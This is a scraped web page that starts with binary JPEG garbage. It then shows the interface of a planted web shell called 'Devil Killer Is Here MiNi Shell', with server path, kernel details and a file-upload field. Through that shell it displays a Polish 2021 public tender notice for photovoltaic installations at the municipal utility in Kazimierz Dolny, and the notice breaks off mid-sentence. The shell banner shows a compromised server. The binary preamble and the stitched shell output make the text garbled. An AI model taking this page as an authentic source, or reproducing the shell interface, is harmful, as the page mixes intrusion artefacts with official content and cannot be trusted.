JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211026/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211026/0024505201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Budowa instalacji służącej do produkcji energii pochodzącej ze źródeł odnawialnych na potrzeby Miejskiego Zakładu Komunalnego w Kazimierzu Dolnym Sp. z o.o. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejski Zakład Komunalny w Kazimierzu Dolnym Sp. z o.o</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 366152410</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Filtrowa 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kazimierz Dolny</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">24-120</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">81 88 10 002</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">81 88 10 198</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">inwestycje@mzkkazimierzdolny.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mzkkazimierzdolny.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> sektor wodny </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa instalacji służącej do produkcji energii pochodzącej ze źródeł odnawialnych na potrzeby Miejskiego Zakładu Komunalnego w Kazimierzu Dolnym Sp. z o.o. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-740b2023-33eb-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00245052</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00057118/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Budowa instalacji służącej do produkcji energii pochodzącej ze źródeł odnawialnych na potrzeby Miejskiego Zakładu Komunalnego w Kazimierzu Dolnym Sp. z o.o</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Regionalny Program Operacyjny Województwa Lubelskiego na lata 2014 – 2020, Oś Priorytetowa: 4 ENERGIA PRZYJAZNA ŚRODOWISKU, Działanie: 4.2, współfinansowanego ze środków europejskich. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-740b2023-33eb-11ec-a3fb-0a24f8cd532c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym<br/>a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem:<br/>https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz<br/>poczty elektronicznej http://inwestycje@mzkkazimierzdolny.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.<br/>Dokumenty przekazywane za pośrednictwem środków komunikacji elektronicznej w formie<br/>elektronicznej są sporządzane, zgodnie z § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30<br/>grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452) –<br/>zwane dalej jako „Rozporządzenie” – w związku z art. 18 ustawy z dnia 17 lutego 2005 r. o<br/>informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2020 r., poz. 346 z<br/>późn. zm.), odsyłającym do rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie<br/>Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (tj.<br/>Dz. U. z 2017 r., poz. 2247 z późn. zm.) oraz zgodnie z formatami podpisu elektronicznego<br/>określonymi w tych przepisach prawa – w szczególności w formatach: .pdf, .doc, .docx, .rtf, .odt.,<br/>.xades, .pades, .txt, .xls, .xlsx, .zip.<br/>2. Zalecenia Zamawiającego odnośnie podpisu elektronicznego:<br/>a) odnośnie kwalifikowanego podpisu elektronicznego:<br/>- dla dokumentów w formacie „pdf” zaleca się podpis w formatem PAdES,<br/>- dokumenty w formacie innym niż „pdf” zaleca się podpisywać formatem XAdES.<br/>b) odnośnie podpisu osobistego:<br/>- dla dokumentów w formacie „pdf” lub „xml” zaleca się podpis wewnętrzny (otoczony),<br/>- dokumenty w formacie innym niż „pdf” zaleca się podpisywać podpisem zewnętrznym lub<br/>otaczającym.<br/>UWAGA!<br/>Złożenie na dokumencie własnoręcznego podpisu a następnie jego zeskanowanie i przesłanie do<br/>Zamawiającego nie jest równoznaczne z podpisem osobistym, o którym mowa w art. 63 ust. 2 ustawy<br/>oraz niniejszej SWZ i w takim przypadku oferta zostanie odrzucona.<br/>Przez podpis osobisty, zgodnie art. 2 ust. 1 pkt 9) ustawy z dnia 6 sierpnia 2010 r. o dowodach<br/>osobistych (Dz. U. z 2021 r., poz. 816), należy rozumieć zaawansowany podpis elektroniczny w<br/>rozumieniu art. 3 pkt 11 rozporządzenia Parlamentu Europejskiego i Rady (UE) nr 910/2014 z dnia 23<br/>lipca 2014 r. w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcji<br/>elektronicznych na rynku wewnętrznym oraz uchylającego dyrektywę 1999/93/WE, weryfikowany za<br/>pomocą certyfikatu podpisu osobistego.<br/>c) odnośnie podpisu zaufanego:<br/>- wielkość dokumentów nie może przekraczać 10 MB (Szczegółowe informacje dotyczące podpisu<br/>zaufanego można uzyskać pod adresem: https://www.gov.pl/web/gov/podpisz-dokumentelektronicznie-<br/>wykorzystaj-podpis-zaufany)<br/>Jeżeli jest to możliwe, zalecane jest stosowanie podpisu otaczającego – wewnętrznego – który polega<br/>na tym, że jest zapisany łącznie z podpisywanym dokumentem (tworzą jeden plik), a nie oddzielnie<br/>(plik podpisywany i plik podpisu).<br/>35. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego,<br/>musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do<br/>następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do<br/>„Formularza do komunikacji”.<br/>4. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej (ePUAP).<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz<br/>złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodniezart.13ust.1i2rozporządzeniaParlamentuEuropejskiegoiRady(UE) 2016/679 zdnia27kwietnia2016r.wsprawieochronyosóbfizycznych wzwiązku z przetwarzaniem danych osobo wych i wsprawieswobodnegoprzepływutakich danychorazuchyleniadyrektywy95/46/WE(ogólne rozporządzenieo ochronie danych)(Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję,<br/>żeadministratorem Pani/Panadanychosobowychjest że:administratoremPani/Pana danychosobowychjestMiejskiZakładKomunalny wKazimierzuDolnymSp. z o.o. z siedzibą wKazimierzuDolnym,ul. Filtrowa 8.2. AdministratorwyznaczyłInspektoremOchronyDanych,zktórym może się Pani/Pankontaktowaćwsprawachzwiązanych z ochrona danych poprzez pocztę elektronicznąnaadres:<br/>iod@mzkkazimierzdolny.pl lub listownienaadresMiejski ZakładKomunalnywKazimierzuDolnymSp. z<br/>o.o. z siedzibąwKazimierzu Dolnym, ul.Filtrowa8., zdopiskiem„InspektorOchronyDanych”;3. Pani/Pana<br/>dane osoboweprzetwarzanebędąnapodstawieart. ust.1lit.cRODOwcelupro wadzenia<br/>postępowaniaoudzieleniezamówieniapublicznegoorazzawarciaumowy, a podstawą prawną ich<br/>przetwarzania jest obowiązek prawny stosowania sformalizowa nych procedur udzielania zamówień<br/>publicznych spoczywający na Zamawiającym;4. Odbiorcami Pani/Pana danych osobowych będą<br/>osobylub podmioty, którym udostępniona zosta nie dokumentacjapostępowania w oparciu o art. 18<br/>oraz art.<br/>74 ustawy Pzp;5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp,<br/>przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania<br/>umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;6. Obowiązek<br/>podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem<br/>ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w po stępowaniu o<br/>udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy<br/>Pzp;7. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zauto matyzowany, stosowanie do art. 22 RODO.8.Posiada Pan/Pani:na podstawie art. 15 RODO<br/>prawo dostępu do danych osobowych Pani/Pana dotyczących;na podstawie art. 16 RODO prawo do<br/>sprostowania lub uzupełnienia Pani/Pana danych osobowych, przy czym skorzystanie z prawa do<br/>sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznego ani zmianą postanowień umowy w zakresie nie zgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.na podstawie art. 18 RODO prawo<br/>żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania<br/>nie ma zastosowania w odniesieniu do przechowywania, wcelu zapew nienia korzystania ze środków<br/>ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne<br/>względy interesupublicznegoUniiEuropejskiejlubpaństwaczłonkow skiego, takżenie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia.prawo<br/>do wniesienia skargi do PrezesaUrzęduOchrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; 9. Nie przysługuje<br/>Pani/Panu:w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia<br/>danychosobowych;prawodoprzenoszeniadanychosobowych,októrym mowa w art. 20 RODO;na<br/>podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzaniadanych osobowych,gdyżpod ‐<br/>stawąprawnąprzetwarzaniaPani/Panadanychosobowych jest art. 6 ust. 1 lit. c RODO.10. Jednocześnie<br/>Zamawiający przypominaociążącym na Pani/Panu obowiązku informacyjnym wyni kającym z art. 14<br/>RODOwzględem osób fizycznych, których dane przekazane zostaną Zamawiającemuwzwiązku z<br/>prowadzonympostępowaniemiktóreZamawiającypośredniopozyska od wykonawcy biorącego udział w<br/>postępowaniu, chyba żemazastosowanieco najmniejjednozwyłączeń, o<br/>którychmowawart.14ust.5RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Posiada Pan/Pani:<br/>• na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>• na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych,<br/>przy czym skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie nie ‐<br/>zgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>• na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapew ‐<br/>nienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub<br/>prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkow ‐<br/>skiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o<br/>udzielenie zamówienia.<br/>• prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9. Nie przysługuje Pani/Panu:<br/>• w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;• prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>• na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż pod ‐<br/>stawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>10. Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wyni ‐<br/>kającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną<br/>Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska<br/>od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z<br/>wyłączeń, o których mowa w art. 14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.04.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest: Budowa instalacji służącej do produkcji energii pochodzącej ze<br/>źródeł odnawialnych na potrzeby Miejskiego Zakładu Komunalnego w Kazimierzu Dolnym Sp. z<br/>o.o. w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2014 –<br/>2020, Oś Priorytetowa: 4 ENERGIA PRZYJAZNA ŚRODOWISKU, Działanie: 4.2,<br/>współfinansowanego ze środków europejskich.<br/>2. Na całość przedmiotu zamówienia składa się realizacja następujących zadań:<br/>Zadanie nr 1<br/>Instalacja fotowoltaiczna do 50 kWp – Oczyszczalnia ścieków w Kazimierzu Dolnym.<br/>Instalacja na dachu budynku oraz na gruncie.<br/>Przedmiot opracowania zostanie zainstalowany na terenie Oczyszczalni ścieków<br/>w Kazimierzu Dolnym przy ul. Kazimierskiej 122, 24-120 Kazimierz Dolny, na działce nr 325/3.<br/>Zadanie nr 2<br/>Instalacja fotowoltaiczna do 50 kWp – Hydrofornia Wierzchoniów.<br/>Instalacja na gruncie.<br/>Przedmiot opracowania zostanie zainstalowany na terenie hydroforni<br/>w miejscowości Wierzchoniów 83, 24-120 Kazimierz Dolny, na działce nr 191/4.<br/>Zadanie nr 3<br/>Instalacja fotowoltaiczna do 50 kWp - Ujęcie wody WO-3-1116 w Kazimierzu Dolnym.<br/>Instalacja na gruncie.<br/>Przedmiot opracowania zostanie zainstalowany na terenie ujęcia wody w Kazimierzu Dolnym<br/>przy ul. Filtrowa 8, 24-120 Kazimierz Dolny, na działce nr 776.<br/>3. Szczegółowy zakres robót stanowi załącznik w postaci Opisu Przedmiotu Zamówienia,<br/>stanowiący załącznik nr 1 do SWZ oraz załącznik nr 1a do SWZ przedmiar robót. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09331100-9 - Kolektory słoneczne do produkcji ciepła</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09332000-5 - Instalacje słoneczne</p> <p class="mb-0">45261215-4 - Pokrywanie dachów panelami ogniw słonecznych</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>2. Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru:<br/>S = C + G +G1<br/>Maksymalna liczba punktów wynosi 100, przy założeniu, że 1 pkt odpowiada 1 %.<br/>3. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Punkty uzyskane<br/>w powyższych kryteriach zostaną zsumowane. Najwyższa liczba punktów wyznaczy najkorzystniejszą<br/>ofertę.<br/>4. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia<br/>taki sam bilans ceny lub kosztu i innych kryteriów oceny ofert, Zamawiający dokona wyboru oferty<br/>zgodnie z art. 248 ustawy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość trwania gwarancji na wady ukryte inwertera świadczonej przez producenta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość trwania gwarancji na prace montażowe świadczone przez Wykonawcę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 3) sytuacji ekonomicznej lub finansowej - warunek zostanie uznany za spełniony, jeżeli<br/>Wykonawca przedłoży polisę, a w przypadku jej braku inny dokument potwierdzający, że<br/>Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej<br/>działalności związanej z przedmiotem zamówienia na kwotę minimalną 500 000 zł;<br/>4) zdolności technicznej lub zawodowej - zamawiający stawia wymagania w zakresie:<br/>zdolności technicznej<br/>Wykonawca zobowiązany jest posiadać pozytywne i udokumentowane doświadczenie w<br/>realizacji dostaw będących przedmiotem 